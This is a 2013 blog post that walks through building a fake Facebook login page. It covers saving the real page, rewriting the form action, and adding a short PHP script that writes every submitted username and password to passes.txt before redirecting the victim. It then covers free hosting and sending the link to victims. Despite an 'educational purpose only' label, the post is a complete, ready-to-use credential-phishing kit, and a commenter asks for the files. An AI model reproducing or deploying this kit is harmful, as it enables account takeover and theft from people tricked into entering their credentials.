Wednesday, 10 April 2013

PHISHING IN FACEBOOK ███




                                           How does Pishing Work

FOR EDUCATIONAL PURPOSE ONLY

Phishing is process of acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in anelectronic communication or any type of information which the hacker want to know. 

A phishing page of a site is just a ditto copy of a site. No one can easily detect a difference. In this, 
we just clone a site login or any other important page.







            
How to create?

  • Visit the page that you want to clone.
  • Save it (CTRL+S) via your browser.
  • Choose save complete webpage while saving it via browser.
  • Give name index while saving. (Dont use other name!)
  • Save it to a folder.
  • Now, you should have one file named "index.htm" and a folder.
  • We have to edit index.htm file.
  • Edit it and search "action" without "". You will get something like this if you are creating fake page of facebook, action="https://www.facebook.com/login.php?login_attempt=1" method="post" , We have to edit this line only. Changehttps://www.facebook.com/login.php?login_attempt=1 to login.php (How to create login.php is written below) and change post to get , and save it.


    How to create login.php?

    Here is the code for login.php, just copy the below code, paste it in notepad and save it as login.php.

    Code:

    <?php
    header("Location: http://www.google.com");
    $handle = fopen("passes.txt", "a");
    foreach($_GET as $variable => $value)
    {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
     

    You have to change http://www.google.com to the site url that you are cloning, for example, change it to http://www.facebook.com/ if you are cloning facebook.
Now make a file with the name passes.txt. This will be blank file.

now if you are unable to edit the and make the files then i can provide you the zip folder of these index.htm, passes.htm, login.php.


You just have to upload these files to any free web hosting websites.
such as www.5gbfree.com. There are many other free web hosting websites but this is the best according to me.

You will get a online address of your files that is your fake facebook page.
Now you just have to copy the address of your fake page and make your victim to login on your fake page by sending him the link of address of your fake page.

you will get your password in the passes.txt.

This for educational purpose so that you get aware of how does the pishing in facebook work.

for any queries or problem please comment.

2 comments:

  1. Where can i get the zip files of these...

    ReplyDelete
  2. It's actually a cool and helpful piece of information. I'm happy that you
    shared this useful information with us. Please stay
    us informed like this. Thanks for sharing.



    my webpage - rackspace cloud servers reviews

    ReplyDelete

Airport Authority of India AAI JE Previous Year paper

I have tried to collect previous year paper of Airport Authority of India. AAI JE ATC PREVIOUS YEAR PAPER                            ...